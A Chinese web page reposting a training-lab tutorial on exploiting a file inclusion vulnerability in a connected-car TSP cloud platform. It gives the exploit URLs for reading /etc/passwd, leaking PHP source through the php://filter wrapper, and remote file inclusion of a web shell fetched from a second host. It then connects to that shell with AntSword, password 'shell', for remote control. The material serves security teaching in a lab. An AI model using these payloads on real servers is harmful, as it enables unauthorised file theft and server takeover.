登陆

首页

知识

资讯

工具

学堂

活动

合作

首页> 问答> 轩辕实验室┃智能网联汽车信息安全实训平台-TSP云平台的文件包含漏洞实验

轩辕实验室┃智能网联汽车信息安全实训平台-TSP云平台的文件包含漏洞实验

来源：上海控安

2020-11-18

以下文章来源于轩辕实验室，作者轩辕实验室

轩辕实验室

车联网信息安全和预期功能安全技术

微信图片_20201022180405.jpg

智能网联汽车信息安全实训平台的文件包含漏洞实验，测试方案覆盖车机软件、车载通信、车内智能终端设备、车内总线等检测环境。

测试对象

TSP云平台

教学目的

通过指导学生上机实践，让学生学习利用TSP云平台的文件包含漏洞进行攻击的基本原理和操作过程，了解除汽车本身外，TSP平台可能存在的安全威胁，并加强安全防护意识。

详细介绍

本实验介绍一种对TSP云平台进行文件包含漏洞利用的基本过程。利用本地文件包含查看服务器端的隐私文件，利用远程文件包含向服务器上传木马，并使用中国蚁剑连接木马，从而实现对服务器的远程控制。

依赖软件工具

中国蚁剑

一个网站管理工具，也常用于授权人员对网站的安全渗透测试。本实验使用这个工具连接在远程文件包含中植入的网站木马。

依赖硬件工具

Windows系统PC，Ubuntu系统工控机。

实验步骤

实验流程和网络拓扑

搜索到TSP云平台的文件包含漏洞

打开TSP云平台登录页面，观察到URL的参数filename的值是一个login.php，是一个页面，因此推测该平台存在文件包含漏洞。

http://192.168.9.135/include.php?filename=login.php

代码使用了文件包含函数

使用以下命令测试，可以确定漏洞确实存在。

http://192.168.9.135/include.php?filename=/etc/passwd

验证存在文件包含漏洞

使用同样的方法读取key2.php，发现不能直接读取到key信息。

http://192.168.9.135/include.php?filename=test/key2.php

使用本地文件包含来读取本地文件隐私数据

本实验在test目录内放了两个key.php文件。使用以下命令读取key1.php，可以得到解析后的内容。

http://192.168.9.135/include.php?filename=test/key1.php

可以直接读取服务器端的文件内容

使用同样的方法读取key2.php，发现不能直接读取到key信息。

http://192.168.9.135/include.php?filename=test/key2.php

无法看到完整的源代码

为了获取到源代码的内容，可以利用php伪协议，读取key2.php经过base64加密后的数据。

http://192.168.9.135/include.php?filename=php://filter/read=convert.base64-encode/resource=test/key2.php

显示编码后的php文件源代码

将base64密文解码，就可以得到源码中隐藏的key。

看到解码后的源码内容

使用远程文件包含来植入木马

除了读取服务器端的本地文件，还可以利用远程文件包含向服务器上传木马，从而控制服务器。本实验已经在本地部署了一个apache服务器，并定义了木马生成文件 “shell.txt”。

上传木马

访问以下网址来上传木马：

http://192.168.9.135/include.php?filename=http://10.88.20.117/shell.txt

植入木马

通过菜刀或中国蚁剑来连接木马，远程控制服务器

打开中国蚁剑，点击右键，选择 “添加数据”，在 “URL地址” 中输入上一步上传木马使用的URL，连接密码为 “shell”。点击 “测试连接”，显示连接成功后，点击左上角 “添加” 来确认添加此连接。

使用中国蚁剑连接木马

双击该连接，可以看到网站后台的所有文件，并且可以进行新建目录、上传文件等操作。

实现对服务器的远程控制

微信图片_20201022180704.jpg

上一篇：开源和汽车安全关键系统浅谈下一篇：轩辕实验室┃智能网联汽车信息安全实训平台—CAN总线逆向实验

用户评论
共0条评论

2000

推荐问答

技术大咖

缪炜恺

上海控安可信软件创新研究院院长、华东师范大学软件工程学院教授
蔡喁

上海控安可信软件创新研究院副院长、教授级高级工程师
王博文

上海控安可信软件创新研究院副院长兼工控网络安全组总监
冯劲草

上海控安可信软件创新研究院副院长兼系统建模组总监
郁静华

上海控安可信软件创新研究院副院长兼汽车网络安全组总监

合作单位

上海工业控制安全创新科技有限公司

汽车电子、轨道交通、航空航天等安全攸关领域
DEKRA德凯集团

功能安全(ISO 26262)，信息安全(ISO/SAE 21434) ，SOTIF (ISO 21448)和AutomotiveSPICE
普华基础软件股份有限公司

AUTOSAR
中国工业技术软件化产业联盟

工业技术软件化共性技术攻关、行业标准制定、创新方法研究
清华大学苏州汽车研究院

汽车应用技术研发、科技成果转化和工程技术服务

轩辕实验室┃智能网联汽车信息安全实训平台-TSP云平台的文件包含漏洞实验

本实验在test目录内放了两个key.php文件。使用以下命令读取key1.php，可以得到解析后的内容。

除了读取服务器端的本地文件，还可以利用远程文件包含向服务器上传木马，从而控制服务器。本实验已经在本地部署了一个apache服务器，并定义了木马生成文件 “shell.txt”。

打开中国蚁剑，点击右键，选择 “添加数据”，在 “URL地址” 中输入上一步上传木马使用的URL，连接密码为 “shell”。点击 “测试连接”，显示连接成功后，点击左上角 “添加” 来确认添加此连接。

缪炜恺

蔡喁

王博文

冯劲草

郁静华

上海工业控制安全创新科技有限公司

DEKRA德凯集团

普华基础软件股份有限公司

中国工业技术软件化产业联盟

清华大学苏州汽车研究院

合作伙伴